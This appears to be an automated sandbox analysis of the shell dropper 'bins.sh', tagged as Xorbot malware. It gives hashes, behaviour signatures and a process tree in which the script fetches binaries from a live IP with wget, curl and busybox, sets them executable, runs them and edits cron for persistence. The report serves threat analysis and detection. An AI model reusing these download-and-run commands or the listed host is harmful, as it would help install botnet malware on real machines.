Analysis
-
max time kernel
299s -
max time network
300s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20241127-en -
resource tags
arch:amd64arch:i386image:ubuntu2004-amd64-20241127-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system -
submitted
03/04/2025, 22:32
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
debian12-armhf-20240221-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian12-mipsel-20240221-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral5
Sample
bins.sh
Resource
debian9-mipsel-20240729-en
Behavioral task
behavioral6
Sample
bins.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral7
Sample
bins.sh
Resource
ubuntu2004-amd64-20241127-en
Behavioral task
behavioral8
Sample
bins.sh
Resource
ubuntu2204-amd64-20250307-en
Behavioral task
behavioral9
Sample
bins.sh
Resource
ubuntu2404-amd64-20250307-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
2d3354e4454c0aa1442c15ae4db570d7
-
SHA1
fa41bc59a61d70fed29d83a9fadcaf5f29a0306c
-
SHA256
a6be12c3c8dd2355975f18dbeb450c1130df50f893548282b427c4933e1f15cf
-
SHA512
95586720bce8db9d47b64c0e4555ba8d6dbc2899295a18ef6cd7f80558ee39e4088f3b66a22e49846ab83dc5d6a5a07604f5b0ed412b9b40a3ff9867498d8e09
-
SSDEEP
192:vT3jmvfO3m3C3x3+3e35BNkJpg35J5B5uFpYb+2va224Gm6eQmp9lLWLqLzm+B+k:vT3jmvfO3m3C3x3+3e35BNkJpg3bvJb7
Malware Config
Signatures
-
resource yara_rule behavioral7/files/fstream-1.dat family_xorbot behavioral7/files/fstream-3.dat family_xorbot behavioral7/files/fstream-5.dat family_xorbot -
Xorbot family
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1403 chmod 1416 chmod 1460 chmod -
Executes dropped EXE 3 IoCs
ioc pid Process /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G 1404 bins.sh /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv 1417 bins.sh /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E 1461 bins.sh -
Renames itself 1 IoCs
pid Process 1462 bins.sh -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.RXUpp5 crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Changes its process name 3 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself busybox 1402 busybox Changes the process name, possibly in an attempt to hide itself busybox 1415 busybox Changes the process name, possibly in an attempt to hide itself busybox 1459 busybox -
description ioc Process File opened for reading /proc/1/cmdline bins.sh File opened for reading /proc/200/cmdline bins.sh File opened for reading /proc/1095/cmdline bins.sh File opened for reading /proc/1148/cmdline bins.sh File opened for reading /proc/450/cmdline bins.sh File opened for reading /proc/1097/cmdline bins.sh File opened for reading /proc/177/cmdline bins.sh File opened for reading /proc/1500/cmdline bins.sh File opened for reading /proc/73/cmdline bins.sh File opened for reading /proc/90/cmdline bins.sh File opened for reading /proc/15/cmdline bins.sh File opened for reading /proc/21/cmdline bins.sh File opened for reading /proc/265/cmdline bins.sh File opened for reading /proc/1178/cmdline bins.sh File opened for reading /proc/1334/cmdline bins.sh File opened for reading /proc/1474/cmdline bins.sh File opened for reading /proc/75/cmdline bins.sh File opened for reading /proc/76/cmdline bins.sh File opened for reading /proc/477/cmdline bins.sh File opened for reading /proc/1485/cmdline bins.sh File opened for reading /proc/1525/cmdline bins.sh File opened for reading /proc/7/cmdline bins.sh File opened for reading /proc/166/cmdline bins.sh File opened for reading /proc/442/cmdline bins.sh File opened for reading /proc/443/cmdline bins.sh File opened for reading /proc/754/cmdline bins.sh File opened for reading /proc/929/cmdline bins.sh File opened for reading /proc/1398/cmdline bins.sh File opened for reading /proc/619/cmdline bins.sh File opened for reading /proc/264/cmdline bins.sh File opened for reading /proc/267/cmdline bins.sh File opened for reading /proc/1331/cmdline bins.sh File opened for reading /proc/1375/cmdline bins.sh File opened for reading /proc/1478/cmdline bins.sh File opened for reading /proc/72/cmdline bins.sh File opened for reading /proc/573/cmdline bins.sh File opened for reading /proc/668/cmdline bins.sh File opened for reading /proc/793/cmdline bins.sh File opened for reading /proc/1099/cmdline bins.sh File opened for reading /proc/948/cmdline bins.sh File opened for reading /proc/9/cmdline bins.sh File opened for reading /proc/81/cmdline bins.sh File opened for reading /proc/1337/cmdline bins.sh File opened for reading /proc/1476/cmdline bins.sh File opened for reading /proc/1328/cmdline bins.sh File opened for reading /proc/1469/cmdline bins.sh File opened for reading /proc/17/cmdline bins.sh File opened for reading /proc/169/cmdline bins.sh File opened for reading /proc/273/cmdline bins.sh File opened for reading /proc/636/cmdline bins.sh File opened for reading /proc/1000/cmdline bins.sh File opened for reading /proc/663/cmdline bins.sh File opened for reading /proc/170/cmdline bins.sh File opened for reading /proc/171/cmdline bins.sh File opened for reading /proc/563/cmdline bins.sh File opened for reading /proc/963/cmdline bins.sh File opened for reading /proc/1080/cmdline bins.sh File opened for reading /proc/89/cmdline bins.sh File opened for reading /proc/175/cmdline bins.sh File opened for reading /proc/401/cmdline bins.sh File opened for reading /proc/686/cmdline bins.sh File opened for reading /proc/934/cmdline bins.sh File opened for reading /proc/1010/cmdline bins.sh File opened for reading /proc/1609/cmdline bins.sh -
Writes file to tmp directory 9 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G wget File opened for modification /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G busybox File opened for modification /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv wget File opened for modification /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv curl File opened for modification /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E busybox File opened for modification /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G curl File opened for modification /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv busybox File opened for modification /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E wget File opened for modification /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:1394 -
/bin/rm/bin/rm bins.sh2⤵PID:1396
-
-
/usr/bin/wgetwget http://77.90.153.218/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
- Writes file to tmp directory
PID:1397
-
-
/usr/bin/curlcurl -O http://77.90.153.218/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
- Writes file to tmp directory
PID:1401
-
-
/bin/busybox/bin/busybox wget http://77.90.153.218/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
- Changes its process name
- Writes file to tmp directory
PID:1402
-
-
/usr/bin/chmodchmod 777 tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
- File and Directory Permissions Modification
PID:1403
-
-
/tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G./tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵PID:1404
-
-
/usr/bin/rmrm tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵PID:1406
-
-
/usr/bin/wgetwget http://77.90.153.218/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
- Writes file to tmp directory
PID:1407
-
-
/usr/bin/curlcurl -O http://77.90.153.218/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
- Writes file to tmp directory
PID:1414
-
-
/bin/busybox/bin/busybox wget http://77.90.153.218/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
- Changes its process name
- Writes file to tmp directory
PID:1415
-
-
/usr/bin/chmodchmod 777 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
- File and Directory Permissions Modification
PID:1416
-
-
/tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv./59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵PID:1417
-
-
/usr/bin/rmrm 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵PID:1419
-
-
/usr/bin/wgetwget http://77.90.153.218/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
- Writes file to tmp directory
PID:1420
-
-
/usr/bin/curlcurl -O http://77.90.153.218/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
- Writes file to tmp directory
PID:1458
-
-
/bin/busybox/bin/busybox wget http://77.90.153.218/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
- Changes its process name
- Writes file to tmp directory
PID:1459
-
-
/usr/bin/chmodchmod 777 l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
- File and Directory Permissions Modification
PID:1460
-
-
/usr/bin/crontabcrontab -l2⤵PID:1464
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1466
-
-
/usr/bin/rmrm l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵PID:1468
-
-
/usr/bin/wgetwget http://77.90.153.218/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki2⤵PID:1471
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
117KB
MD5849fa04ef88a8e8de32cb2e8538de5fe
SHA1c768af29fe4b6695fff1541623e8bbd1c6f242f7
SHA2568bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579
SHA5122d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf
-
Filesize
99KB
MD59438d9bc392bcf300a5583b6df5bc8f6
SHA1375a6ae34b516f6f3eeea8030c4084f585017efa
SHA25668e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e
SHA5121f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860
-
Filesize
107KB
MD5eb9c3a0de91fcf16ba17cb24608df68c
SHA109d95a7d70d5e115d103be51edff7c498d272fac
SHA256dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47
SHA5129e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27
-
Filesize
210B
MD5a98de0d4d58541673ba114e691e19231
SHA1b1c3305f6af9c5a242fb071fd18450bbd2c77c07
SHA2569aabe1ffd62e7b39aaf555cfadb19f5eb05a7d7b12bdb237195074366c7c467a
SHA512989f7cb30e287bd27560184f94312d0f2c96a875d3f2192e8946c13f748a109c2880c7b6812eeeb42cfe317d054c4310bcce2547c1d5c48849cef7f04adf044b